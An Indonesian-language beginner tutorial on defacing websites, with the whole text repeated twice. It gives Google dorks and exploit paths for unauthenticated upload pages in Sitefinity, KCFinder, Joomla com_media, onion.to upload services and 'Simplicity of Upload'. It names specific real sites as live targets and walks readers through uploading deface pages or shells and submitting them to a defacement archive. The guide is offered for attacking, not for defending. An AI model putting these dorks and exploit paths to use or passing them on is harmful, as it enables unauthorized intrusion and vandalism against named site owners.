Deface untuk pemula
CARA DEFACE
Cara1
Siapkan script sendiri..
1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search
7.selesai!!
Cara2
Method/metode KCFinder
Inurl:/kcfinder/browse.php
Inurl:/Kcfinder/
Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html
Contoh:
https://basukiwater.com/kcfinder/browse.php
jadi
https://basukiwater.com/file/namasckamu.html
cara3
Deface Onion.to File Upload
Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut...
Dork : - inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php
Step By Step :
1. Dorking Dulu
2. Pilih Web Target
3. Pilih File yang mau di'upload
4. Tinggal klik Upload => Done
Contoh Target :
https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html
https://danwin1210.me/uploads/lopeyou.html
https://temp.xn--wda.fr/e719x8JgJ.html
cara4
Metode com media
Bahan :
1. Dork : - inurl:com_media site:com
- inurl:com_media intext:"Upload"
2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Upload'an : Format .txt
Live Target : http://www.james-insurance.co.uk/
Step by Step :
gunakan Live Targert dulu untuk Uji Coba
1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk
2. Pilih salah satu Web
3. Masukkan Exploit
http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
4. Lalu Upload file dalam tempat upload ( format .txt )
Akses shell ?
Tambahkan : /images/namafile.txt
contoh : http://www.james-insurance.co.uk/images/fac.txt
Nanti Jadi Gini Hasilnyaa..
Mudah Bukan?! Tinggal Upload ke Defacer.id
cara5
[POC] Vulnerability Simplicity Of Upload
#Step 1:
Dork: “Powered By: © Simplicity oF Uploadâ€
#Step 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.
#Step 3:
llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)
#Step 4:
Preview: http://[situstargetkamu]/upload/[Your File]
#Step 5: Live Demo:
http://www.railfaneurope.net/pix/upload.php
http://www.formplas.com/upload/upload.php
*Di google masih banyak kok
Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya.
.
Cara1
Siapkan script sendiri..
1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search
7.selesai!!
Cara2
Method/metode KCFinder
Inurl:/kcfinder/browse.php
Inurl:/Kcfinder/
Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html
Contoh:
https://basukiwater.com/kcfinder/browse.php
jadi
https://basukiwater.com/file/namasckamu.html
cara3
Deface Onion.to File Upload
Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut...
Dork : - inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php
Step By Step :
1. Dorking Dulu
2. Pilih Web Target
3. Pilih File yang mau di'upload
4. Tinggal klik Upload => Done
Contoh Target :
https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html
https://danwin1210.me/uploads/lopeyou.html
https://temp.xn--wda.fr/e719x8JgJ.html
cara4
Metode com media
Bahan :
1. Dork : - inurl:com_media site:com
- inurl:com_media intext:"Upload"
2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Upload'an : Format .txt
Live Target : http://www.james-insurance.co.uk/
Step by Step :
gunakan Live Targert dulu untuk Uji Coba
1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk
2. Pilih salah satu Web
3. Masukkan Exploit
http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
4. Lalu Upload file dalam tempat upload ( format .txt )
Akses shell ?
Tambahkan : /images/namafile.txt
contoh : http://www.james-insurance.co.uk/images/fac.txt
Nanti Jadi Gini Hasilnyaa..
Mudah Bukan?! Tinggal Upload ke Defacer.id
cara5
[POC] Vulnerability Simplicity Of Upload
#Step 1:
Dork: “Powered By: © Simplicity oF Uploadâ€
#Step 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.
#Step 3:
llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)
#Step 4:
Preview: http://[situstargetkamu]/upload/[Your File]
#Step 5: Live Demo:
http://www.railfaneurope.net/pix/upload.php
http://www.formplas.com/upload/upload.php
*Di google masih banyak kok
Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya.
.